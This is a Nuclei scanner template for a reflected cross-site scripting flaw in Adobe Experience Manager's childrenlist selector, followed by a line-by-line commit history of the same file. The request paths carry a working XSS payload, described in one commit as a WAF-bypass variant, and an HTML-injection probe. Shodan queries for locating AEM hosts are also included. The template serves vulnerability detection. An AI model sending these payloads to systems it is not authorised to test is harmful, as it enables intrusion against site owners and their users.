nuclei-templates/http/misconfiguration/aem/aem-childrenlist-xss.yaml

id: aem-xss-childlist

info:
  name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting
  author: theabhinavgaur
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: xss,aem,adobe,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
      - "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src="x" data onerror="alert(domain)"/>'
          - '<br /><br />please authenticate<br /><br />'
        condition: or

      - type: word
        part: body
        words:
          - 'data-coral-columnview-id'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ea901d01b02a06ee948fb8452ddf1936c377d4006e2ca155085a17be6a37146502203245bd45cb13c228f5bbd013c7157d8ed9d98e3671068621b999ad3bded15e5d:922c64590222798bb761d5b6d8e72950
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`id: aem-xss-childlist`

			`info:`
Enhancement: misconfiguration/aem/aem-childrenlist-xss.yaml by md 2023-03-08 19:11:33 +00:00			`name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`author: theabhinavgaur`
			`severity: medium`
			`description: \|`
Enhancement: misconfiguration/aem/aem-childrenlist-xss.yaml by md 2023-03-08 19:11:33 +00:00			`Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 5.4`
			`cwe-id: CWE-80`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`shodan-query:`
			`- http.title:"AEM Sign In"`
			`- http.component:"Adobe Experience Manager"`
add misconfig tag to templates in http/misconfiguration 2023-06-02 23:20:49 +00:00			`tags: xss,aem,adobe,misconfig`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`- method: GET`
			`path:`
XSS & HTML Injection 2023-01-16 17:35:08 +00:00			`- "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"`
			`- "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00
XSS & HTML Injection 2023-01-16 17:35:08 +00:00			`stop-at-first-match: true`
templateman update 2023-10-14 11:27:55 +00:00
fix 2023-01-16 17:48:47 +00:00			`matchers-condition: and`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '<img src="x" data onerror="alert(domain)"/>'`
fix 2023-01-16 17:48:47 +00:00			`- '<br /><br />please authenticate<br /><br />'`
			`condition: or`
added waf bypass html payload 2023-01-16 08:07:20 +00:00
			`- type: word`
			`part: body`
			`words:`
Create aem-childrenlist-xss.yaml (#6537) * Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-15 13:29:59 +00:00			`- 'data-coral-columnview-id'`
fix 2023-01-16 17:41:46 +00:00
			`- type: word`
			`part: content_type`
			`words:`
			`- 'text/html'`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100ea901d01b02a06ee948fb8452ddf1936c377d4006e2ca155085a17be6a37146502203245bd45cb13c228f5bbd013c7157d8ed9d98e3671068621b999ad3bded15e5d:922c64590222798bb761d5b6d8e72950`